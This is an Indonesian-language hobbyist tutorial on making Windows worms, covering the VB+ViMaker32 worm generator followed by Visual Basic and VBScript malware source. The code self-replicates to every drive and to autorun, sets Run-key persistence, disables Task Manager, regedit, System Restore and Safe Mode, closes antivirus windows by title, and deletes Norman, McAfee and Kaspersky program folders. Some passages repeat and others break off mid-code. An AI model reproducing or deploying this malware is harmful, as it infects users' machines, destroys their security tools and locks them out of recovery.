Tulisan ini dibuat untuk para newbie yang
ingin tahu, dan mencoba sesuatu hal yang baru dan cukup menyenangkan dan
mengasikan…he..he…
Oke, tanpa banyak
cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan
kita ciptakan, siap….????? Oke kita mulai…..
Tapi sebelumnya ada yang tau VB+Vimaker32
ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan
jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan
khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah
gaulnya GPLLY (ga pake lama la yaw)
Sesuai dengan namanya program ini dapat
menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi
tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan
pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM
(Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar
lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang
laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu
pengetahuan, (Itu kata pembuatnya….)
Oke dech langsung aj kali ye… bis cape ngomong
terus dari tadi ga mulai-mulai neh… Tapi sebelum kita memulai membuat ‘Black
Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang
semuanya bisa didownload di dapur kalian masing-masing:
Sebuah gelas yang berisi air panas lengkap
dengan sendoknya.
Satu sachet cappuccino rasa apa saja yang
belum kadaluwarsa, klo ini bisa didownload di warung terdekat…
Cemilan, kalo bisa yang enak dan ga
mengandung lemak.
Hati, Pikiran dan niat yang tulus dan
ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila
kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja
dikomputer sendiri (sejenis senjata makan tuan gtu…)
Sekarang benar-benar mulai deh, setelah
didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya
backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz
jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan
Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.
Tampilan VB+Vimaker32 RC 03 :
Masukan semua keterangan tentang virus yang
akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi
Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan,
untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi
pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna
banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan
kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal
masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan
leluasa gt.
Untuk pengaturan tentang registry yang akan
diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50
Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan
registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu
worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif
sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis
dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan
Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa
dipilih. Tuh kan
ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program!
He..he…
Berikut tampilan Registry Action Selector :
Masukan semua keterangan tentang virus yang
akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi
Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan,
untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi
pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna
banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan
kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal
masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan
leluasa gt.
Untuk pengaturan tentang registry yang akan
diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50
Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan
registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu
worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif
sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis
dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan
Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa
dipilih. Tuh kan
ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program!
He..he…
Berikut tampilan Registry Action Selector :
angan lupa icon virusnya juga bisa diubah,
untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons
Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang
disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu
adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi
virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa
kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang
dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9
untuk mengcompile project dan sebuah pesan peringatan akan muncul dan
menanyakan apakah proses compile akan dilajutkan, baca dulu semua
konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan
langsung dicompile menjadi file executable (.exe)
ile hasil compile memang cukup besar karena
tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres
dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat
ber-Virus Maker xxx
Belajar buat virus
Ingin tahu gimana membuat virus pakai vb.
ikuti tutorial berikut ini:
Virus ini cuman menggandakan dirinya secara
berulang – ulang,Kalo dibuka akan mengcopy dirinya 2 kali,terus-menerus,memberi
penamaan pada dirinya sesuai nomor yang diacak,dan mendaftarin dirinya ke
Register.bisa ditambahin kode-kode lain supaya lebih mantap,seperti block task:
manager,msconfig,dsb.Mungkin ini kelihatan biasa aja,aq cuman ingin bagi-bagi
ilmu aja,maaf ya.. kalo gak bisa gasih lebih..ini codenya :
Private Sub Form_Load()
On Error Resume Next
KopiSusu
DaftarinKeRegister
End Sub
Public Function Pengacakan(ByVal Low As
Long, ByVal High As Long) As Long
Randomize
Pengacakan = Int((High - Low + 1) * Rnd) +
Low
End Function
Private Sub KopiSusu()
On Error Resume Next
X2 = 0
Do Until X2 = 2
X = Pengacakan(0, 999999999)
FileCopy App.Path & "\" &
App.EXEName & ".exe", App.Path & "\" &
App.EXEName & X & ".exe"
Shell App.Path & "\" &
App.EXEName & X & ".exe"
X2 = X2 + 1
Loop
End Sub
Private Sub DaftarinKeRegister()
X3 = Pengacakan(0, 999999999)
FileCopy App.Path & "\" &
App.EXEName & ".exe", "C:\windows\plaige" & X3
& ".exe"
Dim RegKey
Set RegKey =
CreateObject("WScript.Shell")
RegKey.RegWrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\plaige",
"C:\windows\plaige" & X3 & ".exe"
End Sub
Virus Kikuk yang dibuat dengan VBS
virus ni bukan jahat, tapi usil yaitu
mengganti tulisan mycomputer, recyle bin, my network dan lain-lain. virus ini
juga akan menginfeksi file ke FD. juga secara otomatis autorun dengan membuat
file autorun.inf
Berikut adalah source codenya (karena
dibuat pakai vbs amaka bisa langsung di lihat source codenya....
Explorer\Main\Window Title","Your
Computer Has been Infected By Virus : Paray Rontox"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\International\s1159","Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\International\s2359","Kikuk_Kikuk_666"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics\Shell Icon
Size","128"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control
Panel\Desktop\WindowMetrics\MinWidth","-100"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
"1", "REG_DWORD"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel",
"1", "REG_DWORD"
ParayCity.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
"1", "REG_DWORD"
ParayCity.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity",
"2"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickHeight",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickWidth",
"6000"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardDelay",
"0"
ParayCity.regwrite
"HKEY_CURRENT_USER\Control Panel\Keyboard\KeyboardSpeed",
"36"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning",
"1", "REG_DWORD"
ParayCity.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
NT\SystemRestore\DisableSR", "1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Paray@Hacker",
rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ParayRontox",
rumahgue & "\Kikuk_666_Kikuk.vbs"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
"2", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",
"1", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",
"0", "REG_DWORD"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",
"0", "REG_DWORD"
ParayCity.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Text",
"bangsat kljsdouiyhifeledfdsl"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Type",
"sfgdhtgtygvhgf"
ParayCity.regwrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\",
"Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\IntroText","Maaf
komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InfoTip","Maaf
komputer anda sudah terinfeksi virus Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\",
"Jaringan Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\",
"Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\",
"Dokument Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\",
"Tonk Kikuk_666_Kikuk"
ParayCity.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HelloParay",
rumahgue & "\Kikuk_666_Kikuk_Massage.htm"
if check <> 1 then
Wscript.sleep 300000
end if
loop while check <> 1
set sibungul = createobject("Wscript.shell")
sibungul.run rumahgue &
"\explorer.exe /e,/select, " & Wscript.ScriptFullname
apabila anda lelah memandang dan lelah
untuk copy pa
VirusVb
Untuk virus ni anda membutuhkan 1 form dan
4 Module. Untuk lebih jelasnya silahkan anda lihat coding berikut ini:
Private Sub bunuh_Timer()
'proteksi
tutup "avg"
tutup "anti"
tutup "ANSAV"
tutup "avast"
tutup "asm"
tutup "avira"
tutup "cillin"
tutup "clean"
tutup "CONFIRM FILE DELETE"
tutup "CONFIRM MULTIPLE FILE
DELETE"
tutup "compact"
tutup "CRC"
tutup "debug"
tutup "detect"
tutup "NOD"
tutup "Gasak!!!"
tutup "hijack"
tutup "INTERNET OPTIONS"
tutup "kill"
tutup "KILLBOX"
tutup "k1ckth3w0rm"
tutup "kaspersky"
tutup "mcafee"
tutup "NVC"
tutup "norton"
tutup "regis"
tutup "Norman"
tutup "Ogav"
tutup "panda"
tutup "POCKET KILLBOX"
tutup "proc"
tutup "recovery"
tutup "remover"
tutup "rest"
tutup "scan"
tutup "system"
tutup "System Mechanic"
tutup "Setup"
tutup "SHOW/KILL RUNNING PROCESS"
tutup "SYSTEM RESTORE"
tutup "superdat"
tutup "S m a d A V"
tutup "SmadAV"
tutup "task"
tutup "TKM"
tutup "termin"
tutup "trojan"
tutup "tune"
tutup "update"
tutup "virus"
tutup "vaksin"
tutup "WAV"
tutup "wash"
tutup "walk"
tutup "w32"
'selamatkan moral bangsa
kick "17tahun"
kick "adult"
kick "anal"
kick "bangbros"
kick "bangbus"
kick "Bugil"
kick "CrystalClear"
kick "Doggy Style"
kick "amit-amit"
kick "hentai"
kick "hottie"
kick "kiara kener"
kick "Kama Sutra"
kick "lalatx"
kick "miyabi"
kick "masturb"
kick "naughty"
kick "nude"
kick "naked"
kick "nana1_chunk"
kick "pussy"
kick "porn"
kick "sex"
kick "scandal"
kick "spy cam"
kick "SQ Evolution"
kick "Three Some"
kick "webcam show"
kick "xxx"
Call ganda
Call Racuni_Registry
Call proteksi_folder
End Sub
Private Sub Form_Load()
Y4D0Y666.Hide
App.TaskVisible = False
If App.PrevInstance Then End
'ganda di folder windows dengan nama
dafault.bat
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetWindowsPath & "\" &
"default.bat", 0
'ganda di system32 dengan nama login.exe
dan autoexec.bat
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSystemPath & "\" &
"login.exe", 0
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSystemPath & "\" &
"autoexec.bat", 0
'ganda di mydocument dengan nama Kerispatih
On Da Stage.exe
CopyFile App.Path & "\" &
App.EXEName & ".exe", GetSpecialfolder(CSIDL_PERSONAL) &
"\" & "KerisPatih On Da Stage.exe", 0
Call ganda
Call Racuni_Registry
Call proteksi_folder
Call Kill_antivirus
End Sub
Private Function Racuni_Registry()
On Error Resume Next
'Disable System Restore
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore",
"DisableConfig", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore",
"DisableSR", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows\Installer",
"LimitSystemRestoreCheckpointing", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Policies\Microsoft\Windows\Installer",
"DisableMSI", 1
'Ubah tipe file *.exe jadi Winamp media
file
CreateStringValue HKEY_CLASSES_ROOT,
"exefile", REG_SZ, "", "Winamp media file"
'Manipulasi Internet Explorer
CreateStringValue HKEY_CURRENT_USER,
"Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Window
Title", "..:: YaDoY666 [WuZ HeRe] ::.."
CreateStringValue HKEY_CURRENT_USER,
"Software\Microsoft\Internet Explorer\Main\", REG_SZ, "Start
Page", GetSpecialfolder(CSIDL_PERSONAL) & "\" & "My
Pictures\About.htm"
'auto run virus
CreateStringValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ,
"User-Login", GetSystemPath & "login.exe"
CreateStringValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Run\", REG_SZ,
"Norton", GetWindowsPath & "default.bat"
'Disable Folder Options
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\",
"NoFolderOptions", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\",
"NoFolderOptions", 1
'atur registry agar file dengan yang
disembunyikan tidak tampil
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"HideFileExt", 1
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"Hidden", 0
CreateDwordValue HKEY_CURRENT_USER,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"ShowSuperHidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"HideFileExt", 1
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"Hidden", 0
CreateDwordValue HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\",
"ShowSuperHidden", 0
'Atur registry agar tidak bisa masuk safe
mode
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmio.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"dmload.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"sr.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"vga.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\",
"vgasave.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"dmboot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"dmiot.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpcdd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpdd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"rdpwd.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"sermouse.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"sr.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"tdpipe.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"tdtcp.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"vga.sys"
DeleteValue HKEY_LOCAL_MACHINE,
"SYSTEM\CurrentControlSet\Control\SafeBoot\Network\",
"vgasave.sys"
End Function
Private Function ganda()
Dim ictr As Integer
Dim sAllDrives As String
Dim sDrive As String
sDrive = ""
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If GetDriveType(sDrive) = 3 Or
GetDriveType(sDrive) = 2 Then
CopyFile App.Path & "\" &
App.EXEName & ".exe", sDrive & "I Love You.exe", 0
CopyFile App.Path & "\" &
App.EXEName & ".exe", sDrive & "cewe_bandel.exe", 0
End If
Next
End Function
Private Sub Form_Unload(Cancel As Integer)
Shell GetSystemPath & "\"
& "login.exe"
End Sub
Private Sub proteksi_folder()
On Error Resume Next
SetAttr GetWindowsPath, vbNormal
SetAttr GetWindowsPath & "\"
& "desktop.ini", vbNormal
Kill GetWindowsPath & "\"
& "desktop.ini"
Open GetWindowsPath & "\"
& "desktop.ini" For Output As #1
Print #1, "[.ShellClassInfo]"
Print #1,
"CLSID={C96401CC-0E17-11D3-885B-00C04F72C717}"
Close #1
SetAttr GetWindowsPath & "\"
& "desktop.ini", vbHidden
SetAttr GetWindowsPath, vbSystem
End Sub
Sub Kill_antivirus()
On Error Resume Next
'bunuh antivirus Norman
If Folder_Exist("C:\Norman") =
True Then
prog_AntiVir = Array( _
"C:\Norman\Bin", _
"C:\Norman\Download", _
"C:\Norman\Nse\Bin", _
"C:\Norman\Nvc\Bin", _
"C:\Norman\Nvc\Config", _
"C:\Norman\Qtn\Bin" _
)
SetAttr "C:\Norman", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) & "\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Norman"
End If
'bunuh antivirus Norman kalo ada di dalam
direcktory Program Files
If Folder_Exist("C:\Program
Files\Norman") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Norman\Bin", _
"C:\Program
Files\Norman\Download", _
"C:\Program
Files\Norman\Nse\Bin", _
"C:\Program
Files\Norman\Nvc\Bin", _
"C:\Program
Files\Norman\Nvc\Config", _
"C:\Program Files\Norman\Qtn\Bin"
_
)
SetAttr "C:\Program
Files\Norman", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Norman"
End If
'bunuh antivirus McAfee
If Folder_Exist("C:\Program
Files\McAfee") = True Then
prog_AntiVir = Array( _
"C:\Program Files\McAfee\McAfee
Firewall", _
"C:\Program Files\McAfee\McAfee
VirusScan", _
"C:\Program Files\McAfee\McAfee
VirusScan\Backups\DatBackup", _
"C:\Program Files\McAfee\McAfee
VirusScan\Backups\EngineBackup", _
"C:\Program Files\McAfee\McAfee
VirusScan\Res00", _
"C:\Program Files\McAfee\VirusScan
Wireless" _
)
SetAttr "C:\Program
Files\McAfee", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\McAfee"
End If
'bunuh antivirus McAfee
If Folder_Exist("C:\Program
Files\Kaspersky Lab") = True Then
prog_AntiVir = Array( _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Policy", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Report", _
"C:\Program Files\Kaspersky
Lab\Kaspersky Anti-Virus Personal Pro\Infected" _
)
SetAttr "C:\Program Files\Kaspersky
Lab", vbNormal
For p = 0 To 3
Kill prog_AntiVir(p) &
"\*.exe"
Kill prog_AntiVir(p) &
"\*.dll"
Kill prog_AntiVir(p) &
"\*.zip"
Kill prog_AntiVir(p) &
"\*.vxd"
Kill prog_AntiVir(p) & "\*.*"
Next p
RmDir "C:\Program Files\Kaspersky
Lab"
End If
End Sub
Module BUNUH
Public Declare Function GetForegroundWindow
Lib "user32" () As Long
Public Declare Function SendMessage Lib
"user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal
wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function GetWindowText Lib
"user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal
lpString As String, ByVal cch As Long) As Long
Public Const WM_CLOSE = &H10
Public Function kick(target As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(target)) > 0
Then
SendMessage H, WM_CLOSE, 0, 0
End If
End Function
Module FILE
Public Declare Function CopyFile Lib
"kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As
String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Declare Function
SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Public Declare Function SHGetPathFromIDList
Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl
As Long, ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory
Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal
lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory
Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal
lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CreateDirectory Lib
"kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As
String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Declare Function GetDriveType Lib
"kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String)
As Long
Public Declare Function DeleteFile Lib
"kernel32.dll" Alias "DeleteFileA" (ByVal lpFileName As
String) As Long
Public Declare Function SetFileAttributes
Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName
As String, ByVal dwFileAttributes As Long) As Long
Public Const FILE_ATTRIBUTE_SYSTEM =
&H4
Public Const FILE_ATTRIBUTE_READONLY =
&H1
Public Const FILE_ATTRIBUTE_HIDDEN =
&H2
Public Const FILE_ATTRIBUTE_DIRECTORY =
&H10
Public Const FILE_ATTRIBUTE_ARCHIVE =
&H20
Public Const FILE_ATTRIBUTE_NORMAL =
&H80
Public Type SHITEMID
cb As Long
abID As Byte
End Type
Public Type ITEMIDLIST
mkid As SHITEMID
End Type
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Enum SFolder
CSIDL_DESKTOP = &H0 'menunjukkan folder
virtual yang menyatakan root untuk semua namespace (/Desktop)
CSIDL_PROGRAMS = &H2 'menunjukkan
folder sistem yang berisi grup program user (/Programs)
CSIDL_CONTROLS = &H3 'menunjukkan
folder virtual yang berisi ikon-ikon aplikasi Control Panel (/Control Panel)
CSIDL_PRINTERS = &H4 'menunukkan folder
virtual yang berisi printer-printer yang diinstall (/Printers)
CSIDL_PERSONAL = &H5 'menunjukkan
folder sistem yang digunakan untuk menyimpan dokumen umum user (/My Document)
CSIDL_FAVORITES = &H6 'menunjukkan
folder yang berisi item-item favorite user (/Favorites)
CSIDL_STARTUP = &H7 'menunjukkan folder
yang berisi grup program StartUp user (/Startup)
CSIDL_RECENT = &H8 'menunjukkan folder
sistem yang berisi dokumen-dokumen yang sering digunakan (/Recent)
CSIDL_SENDTO = &H9 'menunjukkan folder
yang berisi item menu Send To (/Send To)
CSIDL_BITBUCKET = &HA 'menunjukkan folder
sistem yang berisi objek file pada RecycleBin user (/Recycle Bin)
CSIDL_STARTMENU = &HB 'menunjukkan
folder sistem yang berisi item-item menu Start (/StartMenu)
CSIDL_DESKTOPDIRECTORY = &H10
'menunjukkan folder sistem yang dapatkan digunakan untuk menyimpan objek file
secara fisik pada desktop
CSIDL_DRIVES = &H11 'menunjukkan folder
yang berisi segala sesuatu pada komputer lokal (/My Computer)
CSIDL_NETWORK = &H12 'menunjukkan
folder yang berisi objek link yang kemungkinan ada pda folder virtual My Network
Places (/My Network Places)
CSIDL_NETHOOD = &H13 'menunjukkan
folder yang menyatakan root dari hierarki namespace network (/NetHood)
CSIDL_FONTS = &H14 'menunjukkan folder
yang berisikan font (/FONT)
CSIDL_TEMPLATES = &H15 'menunjukkan
folder yang digunakan untuk menyimpan dokumen template (/Template)
End Enum
'Get special folder
Public Function
GetSpecialfolder(JenisFolder As SFolder) As String
Dim r As Long
Dim IDL As ITEMIDLIST
'get special folder
r = SHGetSpecialFolderLocation(100,
JenisFolder, IDL)
If r = NOERROR Then
